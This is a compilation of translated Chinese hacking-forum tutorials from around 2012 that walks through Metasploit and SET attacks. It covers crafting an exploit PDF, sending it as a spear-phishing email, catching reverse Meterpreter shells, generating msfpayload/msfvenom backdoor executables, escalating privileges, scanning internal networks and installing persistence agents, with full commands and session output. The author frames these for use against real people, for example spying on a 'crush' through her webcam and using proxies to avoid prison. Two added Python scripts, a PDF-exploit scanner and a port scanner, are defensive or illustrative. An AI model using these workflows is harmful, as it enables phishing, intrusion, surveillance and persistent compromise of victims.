[Pro Tips] The Terrifying Art of Social Engineering, Season 1

I recommend buying the Chinese edition of Metasploit: The Penetration Tester's Guide mentioned in the admin's status; it is on Amazon. Not an ad, the admin gets no commission =.= It is just that for beginner script kiddies (the level of most Chinese hackers) this book is a very good first step toward professional-grade hacking.

As for having to spend money: shall I tell you that Metasploit Pro apparently costs several thousand yuan? Every hobby has its price, just as most of us who run BackTrack in a VM have to buy an extra external wireless adapter.

A few points of common knowledge (skip them if you already have some penetration-testing background):

1° Apart from some social engineering, every intrusion relies on a vulnerability, and most social engineering needs one too. Flies don't bite an uncracked egg; life is not a novel and hackers are not legends, at least the vast majority are not. The legendary hacker of fiction is not an unreachable height: master vulnerabilities 5 to 10 years ahead of the whole era and you are the legend. Even then, plugging in a network cable and owning a box on the spot is rare, because you have no tools. Even the simplest tool we need runs to tens or hundreds of lines; writing tools on the fly will kill you.

2° In practice, with one or two unpublished "excellent"-ranked vulnerabilities in hand, you will find many hosts paper-thin. If you discovered those vulnerabilities yourself, congratulations, you can send your CV to a security company.

3° WooYun regularly publishes vulnerabilities, but even the ones with a high rank are mostly highly targeted bugs with a very narrow footprint, and most of them come down to administrator negligence. These are not the broad vulnerabilities described above.

4° Unless you really hold a vulnerability ahead of its time (some people and organizations certainly do hold such expensive ones), the most frightening thing is always social engineering. The "phishing" the Chinese hacker scene keeps talking about is one kind of social engineering. Social engineering is a very broad craft, nothing like the "guess the password, guess the security question" that some newbies take it for.

Main text.
What I describe is social engineering as I understand it, one person's view; if it differs from what you read online, just smile and move on.
Original by 猪头

The social engineering I cover is built on the BackTrack platform, mainly the Social-Engineer Toolkit (SET). The toolkit is installed under /pentest/exploits/set.

1: Mass phishing email.

Sounds unethical and unlikely to fool anyone, right? The reality is the opposite. In 2010 many large companies, Google among them, were compromised in the "Aurora" attacks, which began with exactly this kind of targeted email.

These days everyone is wary enough not to click strange links in mail of unknown origin, let alone download and run an executable attachment, and the machine's antivirus and firewall are not idle either. None of that means you are safe.

Vulnerability used: a file-format exploit delivered in a specially crafted file.
Case: an Adobe PDF vulnerability.

Register a domain that looks like the company's, such as companyxyz.com, or a subdomain, then send targeted mail. For example, the staff at Google who handle external customer relations are unlikely to refuse to read a mail that appears to come from some company, especially when the content is plausible and the attachment is a PDF document with nothing odd about it. Then, as a matter of course, the PDF is opened, the exploit fires, and the initial foothold is in. One caveat: the file-format exploits SET offers (see the menu below) each target an unpatched version of a specific reader, so the target's software has to be known before the attachment is chosen.
How to generate and send the phishing mail:
————————————————————————————
root@bt:/pentest/exploits/set# ./set

Select from the menu:

1. Spear-Phishing Attack Vectors (*)
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Wireless Access Point Attack Vector
9. Third Party Modules
10. Update the Metasploit Framework
11. Update the Social-Engineer Toolkit
12. Help, Credits, and About
13. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure “Sendmail” is installed (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack (*)
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1

Select the file format exploit you want.

The default is the PDF embedded EXE.
********** PAYLOADS **********

1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. SET Custom Written Document UNC LM SMB Capture Attack
3. Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4. Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5. Adobe Flash Player ‘Button’ Remote Code Execution
6. Adobe CoolType SING Table ‘uniqueName’ Overflow
7. Adobe Flash Player ‘newfunction’ Invalid Pointer Use
8. Adobe Collab.collectEmailInfo Buffer Overflow (*)
9. Adobe Collab.getIcon Buffer Overflow
10. Adobe JBIG2Decode Memory Corruption Exploit
11. Adobe PDF Embedded EXE Social Engineering
12. Adobe util.printf() Buffer Overflow
13. Custom EXE to VBA (sent via RAR) (RAR required)
14. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15. Adobe PDF Embedded EXE Social Engineering (NOJS)
16. Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17. Nuance PDF Reader v6.0 Launch Stack Buffer Overflow

Enter the number you want (press enter for default): 8

1. Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker.
4. Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
6. Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system.
7. Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter.

Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443…
[*] Generating fileformat exploit…
[*] Please wait while we load the module tree…
[*] Started reverse handler on 10.10.1.112:443
[*] Creating ‘template.pdf’ file…
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.

As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of ‘template.whatever’
Do you want to rename the file?
example Enter the new filename: moo.pdf

1. Keep the filename, I don’t care. (*)
2. Rename the file, I want to be cool.
Enter your choice (enter for default): 1
Keeping the filename and moving on.
———————————————————————————
That is the process for generating the "problem" PDF. The items marked (*) are the ones we chose; you can of course change them as circumstances require, for example renaming the PDF to "The three zodiac signs that love once and hurt for life.pdf" = =
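The template.pdf produced above is exactly what a mail gateway or an incident responder has to judge before a user opens it. The following is an added example, not SET or Metasploit code and not part of the original post: a triage script that looks for the constructs those file-format exploits need (script that runs on open, the Collab and util.printf APIs, JBIG2 and U3D objects, and the Launch plus EmbeddedFile pair behind the "Embedded EXE" option), including names hidden behind hex escapes and script hidden inside Flate-compressed streams. The three sample PDFs are constructed inside the script to mimic those payload types; they are not real SET output.

```python
import re
import zlib

# Constructs the SET file-format exploits above depend on: script that runs on
# open (Collab.*, util.printf, getIcon), JBIG2/U3D parsers, and the "embedded
# EXE" trick, which is a /Launch action plus an /EmbeddedFile.
RISKY_NAMES = {
    b"/JavaScript": "JavaScript action",
    b"/JS": "inline JavaScript",
    b"/OpenAction": "action fired when the document opens",
    b"/AA": "additional (automatic) actions",
    b"/Launch": "Launch action, runs an external program",
    b"/EmbeddedFile": "embedded file (dropper payload)",
    b"/JBIG2Decode": "JBIG2 image filter",
    b"/U3D": "U3D 3D annotation",
    b"/RichMedia": "Flash / RichMedia annotation",
}
# API names the JavaScript-based Adobe exploits in the SET menu call.
RISKY_JS_APIS = [b"Collab.", b"collectEmailInfo", b"getIcon", b"util.printf"]

_HEX_IN_NAME = re.compile(rb"#([0-9A-Fa-f]{2})")
_STREAM = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)

def _decode_names(data: bytes) -> bytes:
    """PDF allows hex escapes inside names (/J#61vaScript); fold them back."""
    return _HEX_IN_NAME.sub(lambda m: bytes([int(m.group(1), 16)]), data)

def _views(data: bytes):
    """Yield the text outside streams, then each stream body, inflated when it
    is FlateDecode so that script hidden in a compressed object is seen."""
    yield _decode_names(_STREAM.sub(b"stream\nendstream", data))
    for m in _STREAM.finditer(data):
        body = m.group(1)
        try:
            body = zlib.decompress(body)
        except zlib.error:
            pass  # uncompressed, or a filter we don't handle: scan raw bytes
        yield _decode_names(body)

def scan_pdf(data: bytes) -> dict:
    """Return {indicator: description} for every risky construct in the file."""
    hits = {}
    for view in _views(data):
        for name, why in RISKY_NAMES.items():
            # a name ends at whitespace or a delimiter, so /JS must not match /JSx
            if re.search(re.escape(name) + rb"(?![^\s/\[\]<>(){}%])", view):
                hits[name.decode()] = why
        for api in RISKY_JS_APIS:
            if api in view:
                hits[api.decode()] = "API targeted by known Reader exploits"
    return hits

def verdict(hits: dict) -> str:
    """Gateway policy: droppers and auto-running or exploit-calling script are
    blocked, any other risky construct is held for review, clean files pass."""
    if "/Launch" in hits or "/EmbeddedFile" in hits:
        return "block"
    script = "/JavaScript" in hits or "/JS" in hits
    auto = "/OpenAction" in hits or "/AA" in hits
    exploit_api = any(not k.startswith("/") for k in hits)
    if script and (auto or exploit_api):
        return "block"
    return "review" if hits else "allow"

# --- constructed sample files (not SET output) -------------------------------
def _obj_stream(dict_entries: bytes, body: bytes) -> bytes:
    return b"<< " + dict_entries + b" /Length %d >>\nstream\n" % len(body) + body + b"\nendstream"

def _pdf(objects) -> bytes:
    """Assemble a minimal PDF without an xref table; enough for a scanner."""
    out = [b"%PDF-1.4"]
    for num, body in enumerate(objects, 1):
        out.append(b"%d 0 obj\n" % num + body + b"\nendobj")
    out.append(b"trailer\n<< /Root 1 0 R >>\n%EOF")
    return b"\n".join(out)

_PAGES = [
    b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
    b"<< /Type /Page /Parent 2 0 R /Contents 4 0 R >>",
    _obj_stream(b"", b"BT /F1 12 Tf 72 712 Td (Status report attached) Tj ET"),
]
BENIGN_PDF = _pdf([b"<< /Type /Catalog /Pages 2 0 R >>"] + _PAGES)

# Mimics option 8 above: JavaScript (hex-escaped name, Flate-compressed body)
# calling Collab.collectEmailInfo from an /OpenAction.
COLLAB_PDF = _pdf([b"<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >>"] + _PAGES + [
    b"<< /Type /Action /S /J#61vaScript /JS 6 0 R >>",
    _obj_stream(b"/Filter /FlateDecode",
                zlib.compress(b"this.Collab.collectEmailInfo({msg: unescape('%u0c0c%u0c0c')});")),
])

# Mimics option 11 above: an embedded executable started by a /Launch action.
LAUNCH_PDF = _pdf([b"<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R "
                   b"/Names << /EmbeddedFiles 6 0 R >> >>"] + _PAGES + [
    b"<< /Type /Action /S /Launch /F (template.exe) >>",
    b"<< /Names [(template.exe) 7 0 R] >>",
    b"<< /Type /Filespec /F (template.exe) /EF << /F 8 0 R >> >>",
    _obj_stream(b"/Type /EmbeddedFile", b"MZ\x90\x00\x03\x00\x00\x00"),
])

if __name__ == "__main__":
    for label, pdf in [("benign", BENIGN_PDF), ("collab", COLLAB_PDF), ("launch", LAUNCH_PDF)]:
        found = scan_pdf(pdf)
        print(f"{label:7s} {verdict(found):6s} {sorted(found)}")
```

Running it prints "allow" for the plain report, "block" for both exploit look-alikes. The point of the two separate views is that a naive grep of the raw file sees neither the hex-escaped /JavaScript name nor the compressed script body; a real gateway would add the other PDF filters (ASCIIHex, LZW) and object streams, but the decision logic stays the same.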

Next, set who you are sending to:

————————————————————————————
Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1

Below is a list of available templates:
1: New Update
2: Computer Issue
3: Strange internet usage from your computer
4: LOL…have to check this out…
5: Status Report
6: Pay Raise Application Form
7: WOAAAA!!!!!!!!!! This is crazy…
8: BasketBall Tickets
9: Baby Pics
10: Have you seen this?
11: Termination List
12: How long has it been?
13: Dan Brown’s Angels & Demons

Enter the number you want to use: 5

Enter who you want to send email to: ihazomgsecurity@secmaniac.com

What option do you want to use?
1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1

Enter your GMAIL email address: fakeemailaddy@gmail.com

Enter your password for gmail (it will not be displayed back to you):

SET has finished delivering the emails
———————————————————————————
This attack targets a single email address, attaches the PDF generated earlier, and sends out a lovely, highly deceptive mail. This mail might let you take control of your crush's computer and turn on her webcam. Who knows what you'd see XD

The last step is to set up a Metasploit listener for the payload's reverse connection. (PS: because it is a reverse connection, the victim initiates the connection to the attacker, which is why I said most firewalls won't get in the way: an ordinary host firewall does not block connections you make outbound. This says nothing about antivirus, which inspects the file itself, nor about an egress filter or proxy that logs where outbound connections go.)
———————————————————————————
Do you want to setup a listener yes or no: yes

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 10.10.1.112
LHOST => 10.10.1.112
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler…
msf exploit(handler) >
————————————————————————————————————————————————

When the other side opens your PDF, follow the steps below; your side will show this:
———————————————————————————
[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler…
msf exploit(handler) > [*] Sending stage (748032 bytes) to 10.10.1.102
[*] Meterpreter session 1 opened (10.10.1.112:443 -> 10.10.1.102:58087)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > shell
Process 2976 created.
Channel 1 created.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Bob\Desktop>
———————————————————————————
See the end? It is no longer the BackTrack Linux command line but the XP pseudo-DOS prompt. You have the other side's shell. From here you can do anything.

(PS: skilled use of proxies and jump hosts will greatly extend the time you spend outside prison.)

That is all for today; the admin is so sleepy, sob. This was the first kind of professional social engineering; more updates to come ^_^

Oh, the admin forgot to cover the preparatory social engineering such as password guessing T^T Will try to add it in the next update, probably the afternoon of the 9th = = The admin has finals, so don't blame me for the break... but I won't abandon it ~\(≧▽≦)/~ la la la

猪头, early hours of 2012.5.9
Please credit the source when reposting: http://page.renren.com/601190241/note/844956388

msfmap and scheduleme

I've been looking into Meterpreter lately and came across msfmap, which is great. There are others that do roughly the same, but......

Download link:
https://msfmap.googlecode.com/files/MSFMap-v0.1.1.tar.bz2
How to install?
Find where your MSF lives; on Windows you know your own path. On BT5 it is usually
/opt/metasploit/msf3
/pentest/exploits/framework3
Mine is the first; most installs should be the same.

Make install.sh executable, then run
./install.sh /opt/metasploit/msf3
to install it into msf3.

Load msfmap with: load msfmap
msfmap is more or less like nmap. (Actually, quite a bit less.)

meterpreter > load msfmap
Loading extension msfmap…success.
meterpreter > msfmap -PN 192.168.0.1/24

Starting MSFMap 0.1.1
MSFMap scan report for 192.168.0.1
Host is up.
Not shown: 99 closed ports
PORT   STATE SERVICE
80/tcp open  http

MSFMap scan report for 192.168.0.100
Host is up.
Not shown: 100 closed ports

MSFMap scan report for 192.168.0.101
Host is up.
Not shown: 99 closed ports
PORT   STATE SERVICE
80/tcp open  http

MSFMap scan report for 192.168.0.103
Host is up.
Not shown: 97 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
6001/tcp open  X11:1

MSFMap scan report for 192.168.0.104
Host is up.
Not shown: 100 closed ports

MSFMap scan report for 192.168.0.105
Host is up.
Not shown: 98 closed ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

MSFMap scan report for 192.168.0.107
Host is up.
Not shown: 97 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MSFMap scan report for 192.168.0.108
Host is up.
Not shown: 97 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MSFMap scan report for 192.168.0.111
Host is up.
Not shown: 95 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-term-serv

MSFMap done: 256 IP address (9 hosts up) scanned in 57.54 seconds

meterpreter >

Since a lot of people share my home broadband, the results above aren't the point............ please ignore them.

meterpreter > msfmap -h
MSFMap (v0.1.1) Meterpreter Base Port Scanner
Usage: msfmap [Options] {target specification}

OPTIONS:

--top-ports <opt>  Scan <number> most common ports
-PN                Treat all hosts as online -- skip host discovery
-T<0-5>            Set timing template (higher is faster)
-h                 Print this help summary page.
-oN         <opt>  Output scan in normal format to the given filename.
-p          <opt>  Only scan specified ports
-sP                Ping Scan - go no further than determining if host is online
-sS                TCP Syn scan
-sT                TCP Connect() scan
-v                 Increase verbosity level

Of the options above it seems only the first two work???? Everything after that failed in my tests; no idea why.
meterpreter > msfmap 192.168.0.100-120  (this form works too.)
The scan is a bit off, not very accurate. Until I find a way to load nmap into meterpreter, I'll use this for now.
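What msfmap does from inside a Meterpreter session is an ordinary TCP connect scan of the internal network, just launched from the victim instead of from the attacker's box. Here is that logic in Python as an added example (not msfmap's code and not part of the original post): a connect() probe with the three states nmap reports, a report in the same layout as the transcript above, and a helper that picks the hosts with a given port open for the next pivot. TOP_PORTS is a constructed short list standing in for --top-ports, and the probe is injectable so the reporting can be exercised without touching a network.

```python
import socket
from typing import Callable, Dict, Iterable, List

# Constructed stand-in for msfmap's --top-ports list (the real one is nmap's
# frequency table); enough to exercise the scanner.
TOP_PORTS = [21, 22, 23, 25, 80, 135, 139, 443, 445, 1025, 3306, 3389, 5900, 6001, 8080]

def tcp_probe(host: str, port: int, timeout: float = 1.0) -> str:
    """Full connect() probe (what -sT means): 'open' on a completed handshake,
    'closed' on RST, 'filtered' when nothing answers before the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"
    except OSError:  # socket.timeout, unreachable host, and similar
        return "filtered"

def connect_scan(hosts: Iterable[str], ports: Iterable[int],
                 probe: Callable[[str, int], str] = tcp_probe) -> Dict[str, Dict[int, str]]:
    """Probe every host/port pair. 'probe' is injectable so the reporting and
    pivot logic can be tested without a network."""
    ports = list(ports)
    return {host: {port: probe(host, port) for port in ports} for host in hosts}

def service_name(port: int) -> str:
    """Service label from /etc/services, like the SERVICE column above."""
    try:
        return socket.getservbyport(port, "tcp")
    except OSError:
        return "unknown"

def report(results: Dict[str, Dict[int, str]]) -> str:
    """Render results in the msfmap/nmap layout shown above. Like msfmap -PN we
    skipped host discovery, so every host is reported as up."""
    lines = []
    for host, states in results.items():
        shown = {p: s for p, s in states.items() if s != "closed"}
        lines += [f"Scan report for {host}", "Host is up.",
                  f"Not shown: {len(states) - len(shown)} closed ports"]
        if shown:
            lines.append("PORT      STATE     SERVICE")
            for port in sorted(shown):
                lines.append(f"{port}/tcp".ljust(10) + shown[port].ljust(10) + service_name(port))
        lines.append("")
    return "\n".join(lines)

def hosts_with_port(results: Dict[str, Dict[int, str]], port: int) -> List[str]:
    """Pivot helper: hosts exposing a port, e.g. 445 to try SMB next."""
    return sorted(h for h, states in results.items() if states.get(port) == "open")

if __name__ == "__main__":
    # Real probe against loopback; closed ports answer with RST immediately.
    found = connect_scan(["127.0.0.1"], TOP_PORTS)
    print(report(found))
    print("SMB candidates:", hosts_with_port(found, 445))
```

Run as a script it scans loopback with the real probe; the difference from msfmap is only where the connect() calls originate, which is why a pivoted scan shows up in the victim's own connection logs rather than at the perimeter.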
———————————————————————————————————
meterpreter > run scheduleme -h
Scheduleme — provides most common scheduling types used during a pentest
This script can upload a given executable or script and schedule it to be
executed. All scheduled task are run as System so the Meterpreter process
must be System or local admin for local schedules and Administrator for
remote schedules

OPTIONS:

-c  <opt>  Command to execute at the given time. If options for execution needed use double quotes
-d         Daily.
-e  <opt>  Executable or script to upload to target host, will not work with remote schedule
-h         Help menu.
-hr <opt>  Every specified hours 1-23.
-i         Run command imediatly and only once.
-l         When a user logs on.
-m  <opt>  Every specified amount of minutes 1-1439
-o  <opt>  Options for executable when upload method used
-p         Password for account provided.
-r         Remote Schedule. Executable has to be already on remote target
-s         At system startup.
-t  <opt>  Remote system to schedule job.
-u         Username of account with administrative privelages.

run scheduleme -e /root/2222.exe -l

With -s and -i I never get a session back.
-l does work.

Uploading a backdoor this way amounts to a permanent session: whenever a user logs on, you get a session. Extremely powerful. Upload something that slips past the defenses and, well, you know.

from  :  http://hi.baidu.com/67115248/item/085f9cd043b59b58fa576871

The Meterpreter privilege escalation command getsystem

Metasploit, the best penetration framework in the universe, is pretty much wasted in my hands. I picked it mostly because many exploits on EXPLOIT-DB are published as Metasploit modules; my habit was to run the module, capture the traffic with Wireshark to get a PoC, and not use it much after that, so I never studied its many brilliant tools.

Today, running an exploit for CVE-2009-3867, I happened to select in the payload list

After the exploit succeeded it reported that a Meterpreter session had been established.

From the Meterpreter prompt you can talk to the VM over the returned shell; typing "help" lists the commands this shell provides:

One command, getsystem, looked very tempting:

After some Googling I found how to use it in an official Offensive Security tutorial:

Before running getsystem, check the current user with getuid:

Run getsystem; once it reports success, run getuid again:

More Googling: getsystem offers four escalation techniques (selectable with -t). Only the fourth, KiTrap0D (MS10-015), exploits a kernel vulnerability. The other three, named-pipe impersonation in memory, named-pipe impersonation via a dropped executable, and token duplication, exploit no bug at all: they create a service that connects to a named pipe owned by the Meterpreter process and impersonate the SYSTEM token it presents, which only works when the session already runs as a local administrator. That is why getsystem fails outright for an unprivileged user on a patched system.

The code for all four lives under msf3\external\source\meterpreter\source\elevator; it is the implementation of these techniques, including the KiTrap0D exploit, and worth studying when there is time.

from : hi.baidu.com/kk

P.S. 51CTO very thoughtfully offers the e-book of Metasploit: The Penetration Tester's Guide for download

Metasploit BackDoor For Windows

The Metasploit Framework (MSF) was released as open source in 2003 and is a freely available development framework. It is a powerful open platform for developing, testing and using exploit code, giving penetration testing, shellcode writing and vulnerability research a reliable foundation.
Its extensible model ties payload control, encoders, NOP generators and exploits together, which makes the Metasploit Framework a way to study high-risk vulnerabilities. It bundles the common overflow exploits and popular shellcode for every platform and is constantly updated; the latest MSF ships with more than 750 exploits for popular operating systems and applications plus a large number of shellcodes. As a security tool it plays a role in security assessment that cannot be ignored and underpins automated vulnerability probing and timely detection of system flaws.
It also offers several kinds of backdoor, which we take a quick look at now.

msfpayload as shellcode

List them all; there are currently 248 payloads:

root@Dis9Team:/home/brk# msfpayload -l


It can generate all sorts of things.
To keep it simple, one example:

A normal Windows backdoor

using windows/meterpreter/reverse_tcp:

msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
  msfencode -b '' -t exe -o /var/www/meterpreter.exe


Once it is generated, get the target to run it; on our side we need a listener to receive the shell:

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 8080
LPORT => 8080
msf  exploit(handler) > exploit 

[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800

meterpreter >

Others (php, asp, jsp, dll)

Pick the msfpayload name you want and generate it; you know the drill. For example:
Dll:


Reference: The DLL Hijacking Tutorial
php:

 msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->

JAVA:

 ./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar

An abnormal Windows backdoor

Where there is a normal one there is an abnormal one, for example reverse_https and reverse_http.
Everyone knows these walk straight through firewalls, since the traffic is plain outbound HTTP(S). If the connection is cut unexpectedly the agent keeps trying to reconnect, like Gray Pigeon (灰鸽子). By default a session that goes silent is dropped after 5 minutes; that is the SessionCommunicationTimeout option set in the transcript below, and setting it to 0 means the session never times out for lack of traffic. A separate option, SessionExpirationTimeout, is the agent's absolute lifetime and defaults to one week.

brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Now run it.

msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 1111
LPORT => 1111
msf  exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf  exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf  exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2012-03-21 23:40:06 +0800

It worked. I clicked it once too often, so there are two shells; let's kill the sessions.

msf  exploit(handler) > sessions 

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  2   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
  3   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
msf  exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf  exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf  exploit(handler) > sessions 

Active sessions
===============

No active sessions.

msf  exploit(handler) >

Listen again:

msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf  exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800

The agent reconnected on its own and we have a shell again.

persistence

This is a Meterpreter post-exploitation script; you need a shell session first. It creates a persistent backdoor that can start at boot as a service or when a user logs on.
First connect to the shell and look at the help:

msf  exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >

Now run it:

meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >

The agent is installed in c:\windows and connects back to 5.5.5.1 on port 1234 every 5 seconds.
Now look at what happened on the target machine:

There are a few new VBS files; that is the trojan. The idea is that it runs automatically on reboot or logon, but note that the output above has no "Installing into autorun" line: the script's boot and logon options are the uppercase -X and -U listed in the help, the lowercase -x passed here is not one of its options, so the agent was only started once. Rerun with -X or -U if it is to survive a reboot or a logon. How do you remove it afterwards?

[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc

Run that resource file:

meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs
